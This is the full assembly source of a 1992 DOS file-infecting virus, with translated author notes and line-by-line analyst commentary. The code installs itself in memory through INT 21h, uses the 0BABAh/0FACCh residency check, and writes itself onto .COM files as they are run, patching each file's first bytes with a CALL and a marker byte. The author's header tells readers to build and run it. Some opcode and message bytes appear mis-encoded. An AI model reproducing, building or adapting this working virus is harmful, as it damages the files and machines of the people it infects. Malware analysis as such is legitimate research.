;
; (Author's header, translated from Russian text that is mis-encoded on this page.)
;
; Recommended order: assemble it, run it, and only then study the
; source code. (You will have to work through it anyway :-)).
;
; A cute (little) piece of nastiness, filth, rubbish, a beast...
;
; In short, a virus that infects files when someone tries to run them -
; for now only those with the .COM extension. It lives in the attic under
; the INT 21h vector, does not hide its body, and recognizes infected
; files by a "shuriken" (a kind of little star; the author adds a joke
; about what it is used for) located in the 4th byte from the start.
; It checks for its own presence in memory like this: it puts the word
; 0BABAh in AX, issues INT 21h and checks whether 0FACCh comes back
; (the author makes a crude pun on the two constants). If it does, then
; everything is clear about the machine.
;
; Copyright (c) 1992, Gogi&Givi International
;
; Build settings: tiny memory model, one code segment, origin 0100h.
.model tiny
.code
org 0100h

; VirPar: length of the body (StartVirus..endvir) in 16-byte paragraphs,
; plus 2. This value is subtracted from a memory-block size field at
; NeedsBaba when the body goes resident.
VirPar equ (endvir-StartVirus)/16+2
; VirLen: length of the body in bytes. This many bytes are copied into
; memory at NeedsBaba and written to the end of a file at NotCommand.
VirLen equ (endvir-StartVirus)
; gadost: program entry point (see "end gadost"). This is the carrier
; program of the first generation, laid out by hand in the same shape the
; infection routine gives a file: a CALL into the body, the marker byte at
; offset 3, then the rest of the carrier's own code. The carrier's original
; first four bytes are the ones stored at RobbedBytes.
gadost:
        db 'è'                  ; opcode byte of the CALL (author's comment);
                                ; presumably 0E8h shown in the wrong code page
        dw StartVirus-$-2       ; 16-bit displacement of that CALL to StartVirus
        db 15,09h               ; 15 = marker byte at offset 3 (the "shuriken");
                                ; 09h = leftover operand of the carrier's mov ah,
        int 21h                 ; the rest is the carrier's normal code:
        ret                     ; DOS call, then return
; '$'-terminated text used by the carrier. The bytes are shown mis-encoded
; on this page; they are program data and are reproduced unchanged.
GoodMessage db '’®¢ à¨é ‹®§¨áª¨©! ”€Š ž!',13,10,'$'
; StartVirus: reached through the CALL at offset 0100h. Finds its own
; run-time address, copies the four saved bytes from RobbedBytes back to
; 0100h, then performs the residency check on INT 21h.
; Stack after this block: caller's DS and ES remain pushed (popped at
; FucksNow). SI = run-time address of EntryPoint.
; Modifies: AX, CX, SI, DI, ES, DS, flags.
StartVirus:
        pop si                  ; take the CALL's return address off the stack
                                ; (SI is overwritten two instructions later)
        call EntryPoint         ; pushes the run-time address of EntryPoint
EntryPoint:
        pop si                  ; SI = run-time address of EntryPoint; all
                                ; label accesses below are relative to it
        push ds                 ; save the segment registers and SI
        push es
        push si
        mov ax,cs               ; ES = DS = CS for the byte copy
        mov es,ax
        mov ds,ax
        mov di,0100h            ; destination: start of the program image
        add si,RobbedBytes-EntryPoint   ; source: run-time address of RobbedBytes
        mov cx,4                ; four bytes were replaced at infection time
        cld                     ; copy forwards
        rep movsb               ; restore the original first four bytes
        pop si                  ; SI = address of EntryPoint again
        mov ax,0BABAh           ; residency check: request value in AX
        int 21h
        cmp ax,0FACCh           ; the resident handler answers with 0FACCh
        jne NeedsBaba           ; no answer: not resident yet, install
        jmp FucksNow            ; already resident: just run the host program
; NeedsBaba: installation path, taken when the residency check got no answer.
; Shrinks the memory block in front of the saved ES, copies VirLen bytes of
; the body to the paragraph just past the shrunken block, and points the
; INT 21h vector at Int21Server inside that copy.
; In:  SI = run-time address of EntryPoint; saved DS and ES on the stack.
; Out: falls through to FucksNow with the stack unchanged.
; Modifies: AX, BX, CX, DI, ES, flags.
NeedsBaba:
        pop es                  ; ES = the ES value saved at EntryPoint
        push es                 ; (keep it on the stack for FucksNow)
        mov ax,es               ; author's comment: the segment comes from the PSP
        dec ax
        mov es,ax               ; ES = one paragraph below it; presumably the
                                ; DOS memory control block - TODO confirm
        mov ax,es:[3]           ; size in paragraphs (author's comment)
        sub ax,virpar           ; give up VirPar paragraphs at the top
        mov es:[3],ax           ; write the reduced size back
        mov bx,es:[1]           ; author's comment: plus the PSP segment
        add bx,ax               ; BX = segment just past the reduced block
        mov es,bx               ; ES = destination segment for the resident copy
        push ds
        xor ax,ax
        mov ds,ax               ; DS = 0: interrupt vector table
        mov ax,ds:[21h*4]       ; save the current INT 21h vector (offset) ...
        mov cs:[si+Off21-EntryPoint],ax ; ... into Off21, before the body is copied
        mov ax,ds:[21h*4+2]     ; ... and its segment ...
        mov cs:[si+Seg21-EntryPoint],ax ; ... into Seg21
        pop ds
        xor di,di               ; copy destination offset 0 in the new segment
        push si
        sub si,EntryPoint-StartVirus    ; SI = run-time address of StartVirus
        mov cx,VirLen
        rep movsb               ; copy the whole body (with Off21/Seg21 filled in)
        pop si
        push ds
        xor ax,ax
        mov ds,ax               ; DS = 0 again
        ; New INT 21h vector: offset of Int21Server relative to StartVirus,
        ; because the copy starts at offset 0 of segment ES.
        mov word ptr ds:[21h*4],Int21Server-StartVirus
        mov ds:[21h*4+2],es
        pop ds

; FucksNow: common exit of the start-up code (reached directly when a
; resident copy already answered, or by fall-through after installation).
; Restores the saved segment registers, clears AX, BX and DI, and transfers
; control to offset 0100h, where the original first four bytes were restored.
FucksNow:
        pop es                  ; restore the values pushed at EntryPoint
        pop ds
        mov si,0100h
        push si                 ; use 0100h as the return address
        xor ax,ax               ; clear the registers used above
        xor bx,bx
        xor di,di
        ret                     ; "return" to 0100h: run the host program

; Int21Server: replacement INT 21h handler (the vector is set at NeedsBaba).
; Saves flags, AX, BX and DS, then answers the residency check: a call with
; AX = 0BABAh returns AX = 0FACCh and goes no further. Every other call
; continues at NotTest with the four saved values still on the stack.
; Analyst note: this request/response pair is the in-memory presence test
; used by StartVirus.
Int21Server:
        pushf                   ; saved here, restored at Quit21Server
        push ax
        push bx
        push ds
        cmp ax,0BABAh           ; residency check request?
        jne NotTest             ; no: look at the function number
        pop ds                  ; yes: undo the saves ...
        pop bx
        pop ax
        popf
        mov ax,0FACCh           ; ... and answer "already resident"
        iret                    ; return directly to the caller

; NotTest: decides whether the intercepted call has AH = 4Bh (the author's
; comment names it the EXEC function). The test is written indirectly:
; AX is copied to CX, the halves are swapped so CL holds the old AH, and
; CL is XORed with 4Bh. CX is then popped back; POP does not change the
; flags, so the JZ still sees the result of the XOR.
NotTest:
        push cx                 ; CX is only borrowed for the test
        mov cx,ax
        xchg cl,ch              ; CL = function number (original AH)
        xor cl,4Bh              ; ZF = 1 when the function number is 4Bh
        pop cx                  ; restore CX, flags untouched
        jz Exec                 ; EXEC request: inspect the file name
        jmp NotExec             ; anything else: pass the call on

; Exec: handles an intercepted EXEC request. Scans the name at DS:DX for its
; terminating zero byte, then compares the 11 bytes in front of the
; terminator with CommandName. A match means the name ends in COMMAND.COM;
; that file is skipped and the call is passed on unchanged.
; In:  DS:DX = name of the program being started (offset taken from DX).
; Out: jumps to NotCommand (ES still pushed) or to Quit21Server.
; Modifies: AX, BX, CX, DI, flags (AX and BX are restored at Quit21Server).
Exec:
        mov bx,dx               ; BX = offset of the program name
SearchZero:
        cmp byte ptr ds:[bx],0  ; look for the terminating zero
        je ZeroFound            ; end of the name reached
        inc bx
        jmp SearchZero

ZeroFound:
        sub bx,11               ; BX = start of the last 11 characters
        push es
        mov ax,cs
        mov es,ax               ; ES = segment of the resident copy
        mov cx,11               ; length of 'COMMAND.COM'
        mov di,offset CommandName-StartVirus    ; offset inside the resident copy

Compare:
        mov al,ds:[bx]          ; byte-by-byte comparison of name tail
        cmp al,es:[di]          ; against CommandName
        jne NotCommand          ; first difference: not COMMAND.COM
        inc bx
        inc di
        dec cx
        cmp cx,0
        jne Compare
        pop es                  ; all 11 bytes matched
        jmp Quit21Server        ; COMMAND.COM is left alone

; NotCommand: file-modification routine for a program that is about to be
; executed. Steps, all through INT 21h:
;   1. open the file read/write (AX = 3D02h);
;   2. read its first 4 bytes into RobbedBytes (AH = 3Fh);
;   3. leave the file alone if those bytes start with the 'MZ' signature;
;   4. seek to the end (AX = 4202h) and leave the file alone if the
;      returned length in AX is below 1000 or above 64000;
;   5. store length-3 in FileSize (the displacement for the new CALL);
;   6. leave the file alone if byte 3 of what was read is the marker 15;
;   7. write VirLen bytes from offset 0 of the resident segment to the end
;      of the file (AH = 40h), seek back to the start (AX = 4200h) and
;      write the 4 bytes at SuperByte over the file's first 4 bytes;
;   8. close the file (AH = 3Eh).
; Analyst notes: only AX of the seek result is examined. The lower bound
; uses the signed JL, so a length with bit 15 set also takes the CloseFile
; branch. A modified file therefore starts with the CALL opcode byte, a
; 16-bit displacement equal to (old length - 3), and the byte 15.
; Modifies: AX, BX, CX, DX, DS (AX..DX restored at EndExec, DS at Quit21Server).
NotCommand:
        pop es                  ; restore ES pushed at ZeroFound
        push ax                 ; save the working registers
        push bx
        push cx
        push dx
        mov ax,3D02h            ; open the file at DS:DX for read/write
        int 21h
        jc EndExec              ; open failed: give up
        mov bx,ax               ; BX = file handle
        mov cx,4                ; read 4 bytes ...
        mov ax,cs
        mov ds,ax               ; ... into the resident segment ...
        mov ah,3Fh
        mov dx,offset RobbedBytes-StartVirus    ; ... at RobbedBytes
        int 21h
        jc EndExec              ; read failed: give up
        cmp word ptr cs:[RobbedBytes-StartVirus],'ZM'
        je CloseFile            ; EXE-format file: not touched
        xor cx,cx
        xor dx,dx
        mov ax,4202h            ; seek to end of file; AX = low word of length
        int 21h
        cmp ax,1000             ; lower size limit (signed comparison)
        jl CloseFile
        cmp ax,64000            ; upper size limit (unsigned comparison)
        ja CloseFile
        sub ax,3                ; displacement for a 3-byte CALL at offset 0
        mov cs:[FileSize-StartVirus],ax
        cmp byte ptr cs:[RobbedBytes-StartVirus+3],15
        je CloseFile            ; marker present: file already modified
        mov ax,cs
        mov ds,ax
        mov ah,40h              ; write the resident copy (DS:0000, VirLen
        xor dx,dx               ; bytes) at the current position = end of file
        mov cx,VirLen
        int 21h
        xor cx,cx               ; seek back to the start of the file
        xor dx,dx
        mov ax,4200h
        int 21h
        mov ah,40h              ; overwrite the first 4 bytes with
        mov dx,offset SuperByte-StartVirus      ; SuperByte, FileSize, marker
        mov cx,4
        int 21h
CloseFile:
        mov ah,3Eh              ; close the handle in BX
        int 21h
EndExec:
        pop dx                  ; restore the registers saved at NotCommand
        pop cx
        pop bx
        pop ax
        jmp Quit21Server        ; pass the EXEC request on

; NotExec: label for calls that are not EXEC; it has no code of its own
; (author's comment: kept for later additions) and falls through.
NotExec:

; Quit21Server: common exit of the handler. Restores DS, BX, AX and the
; flags saved at Int21Server, then continues in the previous INT 21h
; handler through a far jump assembled by hand: the byte 0EAh followed by
; the offset and segment words Off21/Seg21, which NeedsBaba fills in with
; the old vector.
Quit21Server:
        pop ds
        pop bx
        pop ax
        popf
        db 0EAh                 ; far-jump opcode; operand follows
Off21   dw 0000h                ; saved INT 21h offset (set at NeedsBaba)
Seg21   dw 0000h                ; saved INT 21h segment (set at NeedsBaba)

; Data area at the end of the body.
;
; RobbedBytes: 4-byte buffer holding the original first four bytes of the
; current host. StartVirus copies it back to 0100h; NotCommand overwrites it
; with the first four bytes of the file being examined. The initial contents
; are the carrier's own opening bytes, written as an instruction plus one
; opcode byte.
RobbedBytes:
        mov dx,offset GoodMessage       ; 3 bytes: the carrier's first instruction
        db 0B4h                         ; 4th byte: first byte of its "mov ah,09h"
; SuperByte..marker: the 4 bytes written over the start of a modified file.
SuperByte db 'è'                ; CALL opcode byte (see gadost); presumably 0E8h
FileSize dw 0000h               ; CALL displacement, set to (file length - 3)
        db 15                   ; marker byte that ends up at file offset 3
        db '=>'                 ; decoration only (author's comment)
CommandName db 'COMMAND.COM<='  ; first 11 bytes are compared at Compare
endvir:                         ; end of the body; used by VirPar and VirLen
end gadost                      ; program entry point is gadost